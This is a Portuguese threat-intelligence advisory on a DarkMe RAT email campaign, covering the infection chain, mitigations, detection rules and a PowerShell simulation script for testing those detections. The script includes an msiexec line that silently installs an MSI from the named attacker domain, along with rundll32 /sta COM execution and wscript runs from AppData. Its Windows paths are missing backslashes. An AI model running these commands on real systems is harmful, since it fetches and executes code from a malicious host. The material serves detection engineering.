SOC Prime Bias: High

25 Sep 2026 08:20 UTC

Campanha de E-mail do DarkMe Amplia Alvos em Ataques APT RAT

Author Photo
SOC Prime Team linkedin icon Seguir
Campanha de E-mail do DarkMe Amplia Alvos em Ataques APT RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma nova campanha distribuindo o spyware RAT DarkMe foi observada utilizando engenharia social em vez de exploits de software. Os atacantes distribuem um .pif arquivo através de e-mail, o qual inicia uma cadeia de infecção em múltiplos estágios envolvendo MSIEXEC e vários carregadores baseados em VB6. A mudança do aproveitamento de dia-zero para engenharia social em grande escala sugere uma transição para métodos de ataque mais baratos, amplos e menos seletivos.

Investigação

A Huntress identificou a campanha após detectar um .pif arquivo que lançava o Windows Installer para recuperar um pacote MSI remoto. A análise revelou uma cadeia complexa em múltiplos estágios envolvendo um script de níveis chamado prnfig.wsf, importações de registro, e execução de um objeto COM através do rundll32.exe /sta. O estágio final utiliza esvaziamento de processo para injetar o payload DarkMe no binário assinado da Microsoft clspack.exe.

Mitigação

Os defensores devem monitorar o rundll32.exe lançado com o /sta sinalizador e um GUID sem um caminho de DLL correspondente. As equipes de segurança devem também detectar msiexec recuperando pacotes MSI remotos sobre HTTPS e investigar a execução de .pif arquivos. Binários assinados pela Microsoft executados de locais incomuns, como %AppData% devem receber atenção adicional.

Resposta

Quando atividade suspeita for detectada, isole imediatamente o endpoint afetado para interromper a comunicação C2 e prevenir a exfiltração de dados. Termine o clspack.exe processo esvaziado e remova artefatos maliciosos de %AppData%ComponentsFolder and %AppData%Microsoft. Remova persistência criada através do manipulador de protocolo personalizado de URL e da chave HKCU Run . Redefina as credenciais de usuários afetados e trate qualquer carteira de criptomoedas armazenada localmente como potencialmente comprometida.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)

Equipe SOC Prime
24 Set 2026

Extensão Incomum de Binário Executável (via process_creation)

Equipe SOC Prime
24 Set 2026

LOLBAS WScript / CScript (via process_creation)

Equipe SOC Prime
24 Set 2026

Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)

Equipe SOC Prime
24 Set 2026

Comando e Controle Suspeito por Solicitação de DNS de Domínio de Alto Nível Incomum (TLD) (via dns)

Equipe SOC Prime
24 Set 2026

IOCs (HashSha256) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT

Regras de AI SOC Prime
24 Set 2026

IOCs (SourceIP) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT

Regras de AI SOC Prime
24 Set 2026

IOCs (DestinationIP) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT

Regras de AI SOC Prime
24 Set 2026

Detectar Comunicação C2 e Estágio de Domínio para DarkMe RAT [Conexão de Rede Windows]

Regras de AI SOC Prime
24 Set 2026

Detecção de Atividades Maliciosas da Campanha DarkMe RAT [Criação de Processo Windows]

Regras de AI SOC Prime
24 Set 2026

Execução de Simulação

  • Narrativa e Comandos de Ataque: O adversário visa implantar o RAT DarkMe para manter a persistência. Para evadir a detecção baseada em assinatura, o atacante utiliza msiexec para puxar um payload remoto de um domínio comprometido (onlineview365.com). Após a infecção inicial, o atacante utiliza rundll32.exe para invocar um objeto COM específico via um GUID para executar código na memória, e subsequentemente utiliza cmd.exe para importar configurações de registro de um arquivo de texto para preparar o ambiente para a execução de um payload baseado em wscript.exe .

  • Script de Teste de Regressão:

    # Script de Simulação DarkMe RAT
    # Este script simula as linhas de comando exatas definidas na regra Sigma.
    
    Write-Host "[+] Iniciando Simulação DarkMe RAT..." -ForegroundColor Cyan
    
    # 1. Simular download remoto do msiexec
    Write-Host "[*] Simulando download remoto do msiexec..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Simular execução de objeto COM do rundll32
    Write-Host "[*] Simulando execução de COM do rundll32..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. Simular importação de registro cmd.exe
    Write-Host "[*] Simulando importação de registro cmd.exe..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Simular execução de wscript.exe via cadeia de pais cmd/rundll32
    Write-Host "[*] Simulando execução de wscript.exe de AppData..."
    $scriptPath = "$env:APPDATAscript_malicioso.vbs"
    "WScript.Echo `"DarkMe Simulado`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # Para acionar a regra específica de pai/filho:
    # Pai: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Filho: wscript.exe %AppData%script_malicioso.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Simulação Completa." -ForegroundColor Green
  • Comandos de Limpeza:

    # Limpeza de Artefatos de Simulação
    Write-Host "[+] Limpando..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAscript_malicioso.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpeza Concluída." -ForegroundColor Green